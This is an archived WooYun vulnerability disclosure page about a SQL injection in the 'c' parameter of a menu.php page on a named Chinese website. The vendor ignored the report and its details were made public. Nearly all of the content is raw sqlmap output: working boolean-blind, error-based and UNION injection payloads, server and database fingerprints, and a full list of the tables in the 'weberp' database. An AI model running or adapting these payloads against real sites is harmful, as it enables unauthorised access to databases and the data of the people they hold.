乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经主动忽略漏洞,细节向公众公开
http://e.csztv.cn/menu.php?c=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: c (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=1' AND 3864=3864 AND 'SBEJ'='SBEJ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=1' AND (SELECT 7523 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(7523=7523,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LIwG'='LIwG Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: c=-1356' UNION ALL SELECT CONCAT(0x7170766b71,0x53646b665a6256454456,0x7176717171)-- ---web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0Database: weberp[44 tables]+----------------------+| twms_backup || twms_guest || twms_instore_main || twms_instore_sub || twms_log || twms_notice || twms_outstore_main || twms_outstore_sub || twms_prod_cate || twms_product || twms_store || twms_user || viooma_accounts || viooma_area || viooma_bank || viooma_basic || viooma_boss || viooma_categories || viooma_config || viooma_dw || viooma_flink || viooma_group || viooma_guest || viooma_gys || viooma_kc || viooma_kcbackgys || viooma_lab || viooma_mainkc || viooma_menu || viooma_none || viooma_part || viooma_pay || viooma_recordline || viooma_reportbackgys || viooma_reportnone || viooma_reportrk || viooma_reportsale || viooma_reportsback || viooma_reportswitch || viooma_sale || viooma_saleback || viooma_staff || viooma_switch || viooma_usertype |+----------------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-15 15:10
漏洞Rank:4 (WooYun评价)
暂无